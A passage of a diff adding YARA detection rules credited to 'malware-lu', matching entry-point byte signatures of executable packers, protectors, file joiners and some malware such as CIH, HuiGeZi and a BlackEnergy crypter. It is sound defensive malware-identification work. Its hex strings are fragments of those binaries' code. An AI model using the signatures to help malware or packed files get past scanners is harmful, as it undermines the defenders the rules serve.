+	$a1 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 5A 59 59 64 89 10 68 3D 1F 06 00 8D 45 EC E8 C3 F6 FF FF C3 }
+	$a2 = { 89 55 F8 BB 01 00 00 00 8A 04 1F 24 0F 8B 55 FC 8A 14 32 80 E2 0F 32 C2 8A 14 1F 80 E2 F0 02 D0 88 14 1F 46 8D 45 F4 8B 55 FC E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B F0 7E 05 BE 01 00 00 00 43 FF 4D F8 75 C2 ?? ?? ?? ?? 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? C3 E9 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2
+}
+	
+	
+rule PseudoSigner02MacromediaFlashProjector60Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeWWPack321xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 20 64 65 63 6F 6D 70 72 65 73 73 69 6F 6E 20 72 6F 75 74 69 6E 65 20 76 65 72 73 69 6F 6E 20 31 2E 31 32 0D 0A 28 63 29 20 31 39 39 38 20 50 69 6F 74 72 20 57 61 72 65 7A 61 6B 20 61 6E 64 20 52 61 66 61 6C 20 57 69 65 72 7A 62 69 63 6B 69 0D 0A 0D 0A 5D 5B 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor07600765hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 00 08 00 00 00 00 00 00 00 60 E8 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECryptv102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ILUCRYPTv4015exe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA C7 46 F7 ?? ?? 42 81 FA ?? ?? 75 F9 FF 66 F7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy13NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 48 36 40 00 E8 54 EE FF FF 6A 00 68 D8 2B 40 00 6A 0A 6A 00 E8 2C EF FF FF E8 23 E7 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VBOXv43v46
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 }
+	$a1 = { 90 03 C4 33 C4 33 C5 2B C5 33 C5 8B C5 ?? ?? 2B C5 48 ?? ?? 0B C0 86 E0 8C E0 ?? ?? 8C E0 86 E0 03 C4 40 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule CodeLockvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CipherWallSelfExtratorDecryptorGUIv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtectorv01bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv037betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 8E FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PrivateExeProtector1xsetisoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? 90 01 ?? BE ?? 10 40 ?? 68 50 91 41 ?? 68 01 ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20a0
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 B4 10 40 00 05 E8 03 00 00 BE E0 E3 41 00 89 44 24 10 B3 20 FF 15 28 10 40 00 68 00 04 00 00 FF 15 14 11 40 00 50 56 FF 15 10 11 40 00 80 3D E0 E3 41 00 22 75 08 80 C3 02 BE E1 E3 41 00 8A 06 8B 3D 14 12 40 00 84 C0 74 19 3A C3 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium1332ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule modifiedHACKSTOPv111f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 B4 30 CD 21 52 FA ?? FB 3D ?? ?? EB ?? CD 20 0E 1F B4 09 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKuku886
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 1E 50 8C C8 8E D8 BA 70 03 B8 24 25 CD 21 ?? ?? ?? ?? ?? 90 B4 2F CD 21 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCIHVersion12TTITWIN95CIH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D ?? ?? ?? 33 DB 64 87 03 E8 ?? ?? ?? ?? 5B 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ShegerdDongleV478MSCo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 32 00 00 00 B8 ?? ?? ?? ?? 8B 18 C1 CB 05 89 DA 36 8B 4C 24 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SmokesCryptv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncryptv31
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? 00 F0 0F C6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncryptv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJoiner12byVaska250320071658
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 02 00 00 8D 85 F4 FD FF FF 56 50 68 04 01 00 00 FF 15 14 10 40 00 90 8D 85 F4 FD FF FF 50 FF 15 10 10 40 00 90 BE 00 20 40 00 90 83 3E FF 0F 84 84 00 00 00 53 57 33 FF 8D 46 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Minke101byCodius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 ?? ?? ?? ?? ?? 10 E8 7A F6 FF FF BE 68 66 00 10 33 C0 55 68 DB 40 00 10 64 FF 30 64 89 20 E8 FA F8 FF FF BA EC 40 00 10 8B C6 E8 F2 FA FF FF 8B D8 B8 6C 66 00 10 8B 16 E8 88 F2 FF FF B8 6C 66 00 10 E8 76 F2 FF FF 8B D0 8B C3 8B 0E E8 E3 E4 FF FF E8 2A F9 FF FF E8 C1 F8 FF FF B8 6C 66 00 10 8B 16 E8 6D FA FF FF E8 14 F9 FF FF E8 AB F8 FF FF 8B 06 E8 B8 E3 FF FF 8B D8 B8 6C 66 00 10 E8 38 F2 FF FF 8B D3 8B 0E E8 A7 E4 FF ?? ?? ?? ?? C4 FB FF FF E8 E7 F8 FF FF 8B C3 E8 B0 E3 FF FF E8 DB F8 FF FF 33 C0 5A 59 59 64 89 10 68 E2 40 00 10 C3 E9 50 EB FF FF EB F8 5E 5B E8 BB EF FF FF 00 00 00 43 41 31 38 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypWrapvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WarningmaybeSimbyOZpolycryptorby3xpl01tver2xx250320072200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 57 8D 7C 24 04 50 B8 00 D0 17 13 AB 58 5F C3 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANHuiGeZi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 C4 ?? FE FF FF 53 56 57 33 C0 89 85 ?? FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeyodascryptor12emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC 90 2C 8A C0 C0 78 90 04 62 EB 01 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1S1Gv11betaD1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 ?? ?? 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PROPACKv208
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C D3 8E C3 8C CA 8E DA 8B 0E ?? ?? 8B F1 83 ?? ?? 8B FE D1 ?? FD F3 A5 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BlackEnergyDDoSBotCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 ?? ?? 81 EC 1C 01 00 00 53 56 57 6A 04 BE 00 30 00 00 56 FF 35 00 20 11 13 6A 00 E8 ?? 03 00 00 ?? ?? 83 C4 10 ?? FF 89 7D F4 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 B8 ?? ?? 1E CD 21 86 E0 3D ?? ?? 73 ?? CD 20 0E 1F B4 09 E8 ?? ?? 24 ?? EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner151GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 87 FF 90 90 B9 2B 00 00 00 BA 07 10 40 00 83 C2 03 90 87 FF 90 90 B9 04 00 00 00 90 87 FF 90 33 C9 C7 05 09 30 40 00 00 00 00 00 68 00 01 00 00 68 21 30 40 00 6A 00 E8 B7 02 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 21 30 40 00 E8 8F 02 00 00 A3 19 30 40 00 90 87 FF 90 8B 15 09 30 40 00 81 C2 04 01 00 00 F7 DA 6A 02 6A 00 52 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeXv099EngbartCrackPl
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv119
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? D6 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv118
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? FD 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 2D ?? ?? 8E D0 51 2D ?? ?? 8E C0 50 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 3B C4 73 ?? 8B C4 2D ?? ?? 25 ?? ?? 8B F8 B9 ?? ?? BE ?? ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeNeolite20emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 39 39 39 20 4E 65 6F 57 6F 72 78 20 49 6E 63 0D 0A 50 6F 72 74 69 6F 6E 73 20 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 37 2D 31 39 39 39 20 4C 65 65 20 48 61 73 69 75 6B 0D 0A 41 6C 6C 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2E 00 00 00 00 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv300v301Relocationspack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BA ?? ?? BF ?? ?? B9 ?? ?? 8C CD 8E DD 81 ED ?? ?? 06 06 8B DD 2B DA 8B D3 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CodeSafe20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ZCode101Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCaz1204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 EE 03 1E 06 B8 FF FF CD 2F 3C 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ZealPack10Zeal
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C7 45 F4 00 00 40 00 C7 45 F0 ?? ?? ?? ?? 8B 45 F4 05 ?? ?? ?? ?? 89 45 F4 C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 F0 7D 22 8B 45 F4 03 45 FC 8A 08 88 4D F8 0F BE 55 F8 83 F2 0F 88 55 F8 8B 45 F4 03 45 FC 8A 4D F8 88 08 EB CD FF 65 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CPAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 4D 5A B1 01 93 01 00 00 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117iBoxLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 67 30 00 00 8D 9D 66 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule INCrypter03INinYbyz3e_NiFe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8D 58 20 C7 03 00 00 00 00 E8 00 00 00 00 5D 81 ED 4D 16 40 00 8B 9D 0E 17 40 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 83 F8 01 75 05 03 DB C1 CB 10 8B 8D 12 17 40 00 8B B5 06 17 40 00 51 81 3E 2E 72 73 72 74 65 8B 85 16 17 40 00 E8 23 00 00 00 8B 85 1A 17 40 00 E8 18 00 00 00 8B 85 1E 17 40 00 E8 0D 00 00 00 8B 85 22 17 40 00 E8 02 00 00 00 EB 18 8B D6 3B 46 0C 72 0A 83 F9 01 74 0B 3B 46 34 72 06 BA 00 00 00 00 C3 58 83 FA 00 75 1A 8B 4E 10 8B 7E 0C 03 BD 02 17 40 00 83 F9 00 74 09 F6 17 31 0F 31 1F 47 E2 F7 59 83 C6 28 49 83 F9 00 75 88 8B 85 0A 17 40 00 89 44 24 1C 61 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MorphineV27Holy_FatherRatter29A
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 }
+
+condition:
+		$a0
+}
+	
+	
+rule nBinderv361
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C 00 5C 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C }
+
+condition:
+		$a0
+}
+	
+	
+rule MatrixDongleTDiGmbH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 E8 B6 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? E8 00 00 00 00 5B 2B D9 8B F8 8B 4C 24 2C 33 C0 2B CF F2 AA 8B 3C 24 8B 0A 2B CF 89 5C 24 20 80 37 A2 47 49 75 F9 8D 64 24 04 FF 64 24 FC 60 C7 42 08 ?? ?? ?? ?? E8 C5 FF FF FF C3 C2 F7 29 4E 29 5A 29 E6 86 8A 89 63 5C A2 65 E2 A3 A2 }
+	$a1 = { E8 00 00 00 00 E8 00 00 00 00 59 5A 2B CA 2B D1 E8 1A FF FF FF }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20RC2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 70 92 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule UnoPiX075BaGiE
+{
+      meta:
+		author="malware-lu"
+strings:
